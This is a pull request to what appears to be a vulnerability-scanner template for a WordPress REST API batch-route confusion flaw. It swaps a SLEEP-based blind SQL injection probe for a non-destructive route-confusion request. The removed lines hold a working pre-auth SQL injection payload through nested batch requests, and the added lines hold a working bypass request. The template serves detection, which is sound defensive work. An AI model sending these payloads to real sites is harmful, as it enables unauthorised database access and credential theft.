### PR TITLE
Improve CVE-2026-63030: safe route-confusion detection

### DIFF
--- a/http/cves/2026/CVE-2026-63030.yaml
+++ b/http/cves/2026/CVE-2026-63030.yaml
@@ -1,15 +1,15 @@
 id: CVE-2026-63030
 
 info:
-  name: WordPress Core 6.9-7.0.1 - Pre-Auth Blind SQL Injection (Batch-Route Confusion)
-  author: slcyber,mielverkerken,pdteam
+  name: WordPress Core 6.9-7.0.1 - Pre-Auth Batch-Route Confusion
+  author: slcyber,mielverkerken,pdteam,flx-0x00
   severity: critical
   description: |
-    WordPress core versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are vulnerable to a pre-authentication timing-based blind SQL injection via the REST API batch endpoint. A route confusion vulnerability (CVE-2026-63030) allows nested batch requests to bypass authentication checks, while a SQL injection flaw (CVE-2026-60137) in the author_exclude parameter of /wp/v2/categories allows arbitrary SQL queries via a SLEEP-based timing oracle. An unauthenticated attacker can extract the full database contents including user credentials.
+    WordPress core versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are vulnerable to a pre-authentication route confusion issue in the REST API batch endpoint (/?rest_route=/batch/v1). A malformed nested batch request desynchronizes the batch router, allowing unauthenticated requests to reach unintended REST API handlers and bypass authorization checks. This route confusion can be chained with a SQL injection flaw (CVE-2026-60137) in the author_exclude parameter to extract database contents and ultimately achieve remote code execution. This template safely detects the vulnerable handler state via the route confusion behavior alone, without executing SQL or relying on response timing.
   impact: |
-    An unauthenticated attacker can read the entire WordPress database contents including user credentials (password hashes), posts, configuration, and any stored secrets. This enables full site compromise through credential extraction and offline password cracking. The original research demonstrated extracting admin password hashes and is working toward full remote code execution.
+    The route confusion allows unauthenticated requests to reach REST API handlers they should not be able to access. When chained with the associated SQL injection, an unauthenticated attacker can read the entire WordPress database (including user credential hashes) and escalate to full site compromise and remote code execution.
   remediation: |
-    Update WordPress immediately to version 6.9.5 or 7.0.2. As a temporary mitigation, block POST requests to /?rest_route=/batch/v1 at the WAF or reverse proxy level.
+    Update WordPress immediately to version 6.9.5 or 7.0.2. As a temporary mitigation, block POST requests to /wp-json/batch/v1 and /?rest_route=/batch/v1 at the WAF or reverse proxy level.
   reference:
     - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q
     - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjf
@@ -20,22 +20,22 @@ info:
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
-    cve-id: CVE-2026-63030,CVE-2026-60137
-    cwe-id: CWE-89,CWE-287
+    cve-id: CVE-2026-63030
+    cwe-id: CWE-287
   metadata:
     verified: true
-    max-request: 3
+    max-request: 2
     vendor: wordpress
     product: wordpress
     framework: wordpress
     shodan-query: http.component:"wordpress"
     fofa-query: app="WordPress"
-  tags: cve,cve2026,wordpress,wp-core,sqli,time-based-sqli,preauth,batch-api,blind-sqli,vkev,kev
+  tags: cve,cve2026,wordpress,wp-core,preauth,batch-api,route-confusion,vkev,kev
 
-flow: http(1) && http(2) && http(3)
+flow: http(1) && http(2)
 
 http:
-  # Step 1: Confirm the target is a WordPress site
+  # Step 1: Confirm the target is a WordPress site before probing the batch endpoint
   - method: GET
     path:
       - "{{BaseURL}}"
@@ -43,53 +43,38 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body, "wp-content") || contains(body, "wp-includes") || contains(tolower(header), "rest_route")'
+          - 'contains(body, "wp-content") || contains(body, "wp-includes") || contains(tolower(header), "rest_route") || contains(tolower(header), "wp-json")'
         internal: true
 
-  # Step 2: FALSE condition — SLEEP should NOT trigger, response must be fast
+  # Step 2: Safe route-confusion detection (no SQL execution, no timing oracle)
   - raw:
       - |
         POST /?rest_route=/batch/v1 HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"requests":[{"method":"POST","path":"http://:"},{"method":"POST","path":"/wp/v2/posts","body":{"requests":[{"method":"GET","path":"http://:"},{"method":"GET","path":"/wp/v2/categories?author_exclude=SELECT+IF%28%281%3D0%29%2CSLEEP%287%29%2C0%29"},{"method":"GET","path":"/wp/v2/posts"}]}},{"method":"POST","path":"/batch/v1"}]}
+        {"validation":"normal","requests":[{"method":"POST","path":"http://:"},{"method":"DELETE","path":"/wp/v2/categories/0"},{"method":"POST","path":"/wp/v2/block-renderer/core/paragraph"}]}
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 207
-        internal: true
-
-      - type: word
-        part: body
-        words:
-          - "parse_path_failed"
-        internal: true
-
-  # Step 3: TRUE condition — SLEEP(7) must trigger, confirming SQL injection execution
-  - raw:
-      - |
-        @timeout: 20s
-        POST /?rest_route=/batch/v1 HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"requests":[{"method":"POST","path":"http://:"},{"method":"POST","path":"/wp/v2/posts","body":{"requests":[{"method":"GET","path":"http://:"},{"method":"GET","path":"/wp/v2/categories?author_exclude=SELECT+IF%28%281%3D1%29%2CSLEEP%287%29%2C0%29"},{"method":"GET","path":"/wp/v2/posts"}]}},{"method":"POST","path":"/batch/v1"}]}
-
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - 'duration>=7'
 
       - type: word
         part: content_type
         words:
           - "application/json"
 
-      - type: status
-        status:
-          - 207
-# digest: 490a00463044022021d1044c6cb299d079d10ac0c029fe7d61560f3ec7095c26497a824bbee1503f02200bd7f128a54310482b427e38683ecde102ec655cf154dafe9179ed81f065f47e:922c64590222798bb761d5b6d8e72950
+      # Vulnerable hosts reach the block-renderer handler through the confused router
+      - type: word
+        part: body
+        words:
+          - "block_cannot_read"
+
+      # Patched hosts route the categories request correctly and return rest_term_invalid
+      - type: word
+        part: body
+        words:
+          - "rest_term_invalid"
+        negative: true


### PR DESCRIPTION
Replace the timing/SLEEP-based blind SQLi detection with a deterministic route-confusion probe to fix false negatives reported in #16629.

- Drop SLEEP timing oracle (WAF-prone, flaky, availability impact)
- Detect batch-route confusion via block_cannot_read + absence of rest_term_invalid (patched hosts route correctly and return it)
- Keep WordPress pre-check gate via flow to avoid false positives
- Update metadata, tags, CWE (CWE-287), and credit flx-0x00

